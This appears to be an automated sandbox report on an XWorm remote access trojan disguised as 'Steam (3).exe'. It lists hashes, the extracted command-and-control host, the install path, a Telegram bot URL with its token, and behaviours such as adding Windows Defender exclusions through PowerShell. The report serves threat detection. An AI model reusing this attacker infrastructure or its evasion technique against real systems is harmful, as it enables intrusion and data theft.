General

  • Target

    Steam (3).exe

  • Size

    787KB

  • Sample

    240527-j4467aec77

  • MD5

    2330d80ec71accda8181221b2aaa204f

  • SHA1

    1f6fd799124e3e599947b60b1054478ad49aa503

  • SHA256

    eb0eac20db3f8e71bc53d2527452cf18acb95b7541cdf61c6520d113194f7cc6

  • SHA512

    e0d9c136eebb923f0e4a8437b73d44a2613aa62f9b70cca305254a866b3027a04c70185027ce6d5a55ff401557fd50d1687ff3dd11ab6e9e7a803be346e6796b

  • SSDEEP

    24576:Wz86IxgoQ2lvi2LV8jTPJ5LuWkUbG2heonbM0gGfcqAWtDToI9AIN:pzLu55LuWksPkonbM0B9ug

Malware Config

Extracted

Family

xworm

C2

region-vip.gl.at.ply.gg:52733

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    Steam.exe

  • telegram

    https://api.telegram.org/bot7186793142:AAGFJjLyhOIBEPcbCbAu3hrbmYsgQ5hzhf4/sendMessage?chat_id=5288662132

Targets

    • Target

      Steam (3).exe

    • Size

      787KB

    • MD5

      2330d80ec71accda8181221b2aaa204f

    • SHA1

      1f6fd799124e3e599947b60b1054478ad49aa503

    • SHA256

      eb0eac20db3f8e71bc53d2527452cf18acb95b7541cdf61c6520d113194f7cc6

    • SHA512

      e0d9c136eebb923f0e4a8437b73d44a2613aa62f9b70cca305254a866b3027a04c70185027ce6d5a55ff401557fd50d1687ff3dd11ab6e9e7a803be346e6796b

    • SSDEEP

      24576:Wz86IxgoQ2lvi2LV8jTPJ5LuWkUbG2heonbM0gGfcqAWtDToI9AIN:pzLu55LuWksPkonbM0B9ug

    • Detect Xworm Payload

    • Xworm

      Xworm is a remote access trojan written in C#.

    • Command and Scripting Interpreter: PowerShell

      Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    • Adds Run key to start application

MITRE ATT&CK Enterprise v15

Tasks